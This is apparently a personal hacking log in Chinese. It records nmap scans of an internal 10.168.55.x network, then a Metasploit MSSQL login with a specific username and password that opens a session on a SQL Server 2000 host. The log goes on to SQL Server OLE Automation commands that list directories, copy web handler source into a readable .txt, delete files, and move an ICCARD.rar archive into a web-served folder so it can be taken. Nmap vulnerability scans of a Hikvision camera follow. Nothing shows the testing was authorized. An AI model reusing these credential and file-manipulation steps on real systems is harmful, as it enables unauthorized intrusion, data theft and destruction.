Host is up (0.0043s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
6000/tcp open X11
Nmap scan report for 10.168.55.254
Host is up (0.013s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE
23/tcp open telnet
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
Nmap done: 256 IP addresses (72 hosts up) scanned in 161.85 seconds哎 怎么有人能给这内网系统玩坠机的。
Nmap scan report for 10.168.55.50
Host is up (0.0067s latency).
Not shown: 976 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
7/tcp open echo
9/tcp open discard?
13/tcp open daytime
| fingerprint-strings:
| NULL:
|_ 10:37:37 2024/10/7
17/tcp open qotd Windows qotd (English)
19/tcp open chargen
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
22/tcp filtered ssh
53/tcp open domain Cloudflare public DNS
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2024-10-07T02:40:28+00:00; +15m00s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=WMSvc-WINDOWS-ZE8CXVR
| Not valid before: 2013-11-15T04:11:44
|_Not valid after: 2023-11-13T04:11:44
1521/tcp open oracle-tns Oracle TNS Listener 10.2.0.1.0 (for 32-bit Windows)
3389/tcp filtered ms-wbt-server
8080/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
8081/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
8085/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
8089/tcp open unknown
8099/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port13-TCP:V=7.95%I=7%D=10/7%Time=670345ED%P=x86_64-pc-linux-gnu%r(NULL
SF:,13,"10:37:37\x202024/10/7\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14m59smsfconsole
search mssql_login
use 0
show options
set RHOSTS 10.168.55.50
set RPORT 1433
set USERNAME bak_user
set PASSWORD whoisyourdaddy
set CreateSession true
exploit
sessions -i 1
query_interactive
exec xp_dirtree "PATH HERE",1,1;找找H_LoginCheck.ashx
E:/XDSite/XDWeb/XDWeb/HandlerFiles/H_LoginCheck.ashx
exec sp_oamethod @ffffffff0x,'copyfile',null,'E:/XDSite/XDWeb/XDWeb/HandlerFiles/H_LoginCheck.ashx','E:/XDSite/XDWeb/XDWeb/HandlerFiles/H_LoginCheck.txt';http://10.168.55.50/HandlerFiles/H_LoginCheck.txt
E:/XDSite/XDWeb/XDWeb/bin/ - BLL_Business/Common/DAL/BDU_Entity .pdb / dll
// 可以使用这个进行文件删除
declare @result int
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out
exec sp_oamethod @ffffffff0x,'deletefile',null,'E:\\WEB_Server_SBTS\\Scripts\\B.txt'
exec sp_oadestroy @ffffffff0x;
// 复制文件
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out
exec sp_oamethod @ffffffff0x,'copyfile',null,'E:\\ICCARD.rar','E:\\WEB_Server_SBTS\\Scripts\\B.txt';22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1801/tcp open msmq
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open msmq-mgmt
3306/tcp open mysql
3389/tcp filtered ms-wbt-server
5985/tcp open wsman
8001/tcp open vcom-tunnelhttp://10.168.55.32:8001/ui/#/login
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-althttp://10.168.55.26/doc/page/login.asp?_1727769895646
继续详细扫描:`nmap --script vuln -T4 10.168.55.26`PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)利用554 rtsp端口试试: > 算了不试 改搜了下hikvision
vulerbility之后发现了jorhelp/Ingram
但是上面的详细扫描结果出来了:nmap -T4 -A -v 10.168.55.26
22/tcp filtered ssh
80/tcp open http HikVision NVR or camera http config
|_http-server-header: Webs
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp Apple AirTunes rtspd
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
3389/tcp filtered ms-wbt-server
8000/tcp open ipcam Hikvision IPCam control port
Service Info: OS: Mac OS X; Device: webcam; CPE: cpe:/o:apple:mac_os_x使用上面的工具扫描:
# targets.txt:
10.168.55.26好像没啥可利用漏洞。